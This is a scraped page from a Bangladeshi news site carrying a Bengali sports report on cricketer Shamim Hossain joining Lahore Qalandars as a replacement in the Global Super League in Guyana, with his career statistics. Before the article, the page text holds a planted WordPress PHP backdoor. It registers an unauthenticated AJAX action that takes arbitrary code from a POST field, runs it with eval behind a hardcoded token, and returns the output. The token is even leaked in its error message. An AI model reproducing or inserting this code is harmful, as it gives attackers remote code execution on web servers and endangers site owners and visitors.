// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বিদেশের ফ্র‍্যাঞ্চাইজি লিগে প্রথমবার ডাক পেলেন শামীম | potrikaybangladesh.com
Saturday, September 19, 2026
Homeবিদেশের ফ্র‍্যাঞ্চাইজি লিগে প্রথমবার ডাক পেলেন শামীম

বিদেশের ফ্র‍্যাঞ্চাইজি লিগে প্রথমবার ডাক পেলেন শামীম

ফর্ম হারিয়ে ফেলায় বাংলাদেশ জাতীয় টি-টোয়েন্টি দলে জায়গা হারিয়েছেন শামীম হোসেন পাটোয়ারি। তবে ফেরার দাবি জানিয়ে রাখতে দারুণ একটি সুযোগ পেয়ে গেলেন এই মারমুখী বাঁহাতি ব্যাটার। গায়ানায় চলমান গ্লোবাল সুপার লিগে (জিএসএল) তাকে দলে নিল পাকিস্তানের লাহোর কালান্দার্স।

দেশের বাইরের কোনো ফ্র‍্যাঞ্চাইজি লিগে এই প্রথম ডাক পেয়েছেন ২৫ বছর বয়সী শামীম। এর আগে বাংলাদেশ প্রিমিয়ার লিগে (বিপিএল) চারটি ভিন্ন দলের হয়ে খেলার অভিজ্ঞতা আছে তার। সেগুলো হলো— ঢাকা ক্যাপিটালস, চিটাগাং কিংস, রংপুর রাইডার্স ও চট্টগ্রাম চ্যালেঞ্জার্স।

মূলত বদলি হিসেবে পাকিস্তানের ফ্র‍্যাঞ্চাইজিটি দলে টেনেছে ইনিংসের শেষদিকে ঝড় তোলার জন্য পরিচিত শামীমকে। লাহোরের ব্যাটার আবদুল্লাহ শফিক সুযোগ পেয়েছেন ওয়েস্ট ইন্ডিজ সফরের পাকিস্তান টেস্ট স্কোয়াডে। তার জায়গায় ঢুকেছেন পরিবারের সঙ্গে যুক্তরাষ্ট্রে ছুটি কাটাতে থাকা শামীম।

লাহোরের ড্রেসিং রুমে চেনা একটি মুখকে পাশে পাচ্ছেন শামীম। বাংলাদেশ জাতীয় দলের আরেক বাঁহাতি ব্যাটার পারভেজ হোসেন ইমন আছেন দলটির ডেরায়।

লাল-সবুজ জার্সিতে ৭ ওয়ানডে ও ৫২ টি-টোয়েন্টি খেলেছেন শামীম। ওয়ানডেতে ৯.৫৭ গড় ও ৭৭.৯০ স্ট্রাইক রেটে তার সংগ্রহ মোটে ৬৭ রান। আর টি-টোয়েন্টিতে ১৭.৭৪ গড় ও ১২২.৭২ স্ট্রাইক রেটে তিনি করেছেন ৬২১ রান। অর্থাৎ জাতীয় দলের হয়ে এখন পর্যন্ত প্রত্যাশা পূরণ করতে পারেননি তিনি।

সব ধরনের স্বীকৃত টি-টোয়েন্টি বিবেচনায় নিলে শামীমের ব্যাটিং পরিসংখ্যান একদম খারাপ না। ১৪৬ ম্যাচ খেলে তিনি ২১৫৮ রান করেছেন ২১.৩৬ গড় ও ১৩৬.৪০ স্ট্রাইক রেটে। তার নামের পাশে ফিফটি আছে আটটি।

পাঁচটি ফ্র‍্যাঞ্চাইজি নিয়ে আয়োজিত গ্লোবাল সুপার লিগের এবারের আসরে তিন ম্যাচ খেলে দুটিতে জিতেছে লাহোর। আগামী বুধবার সান ফ্রান্সিসকো ইউনিকর্নের বিপক্ষে ম্যাচে সুযোগ পেতে পারেন শামীম।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments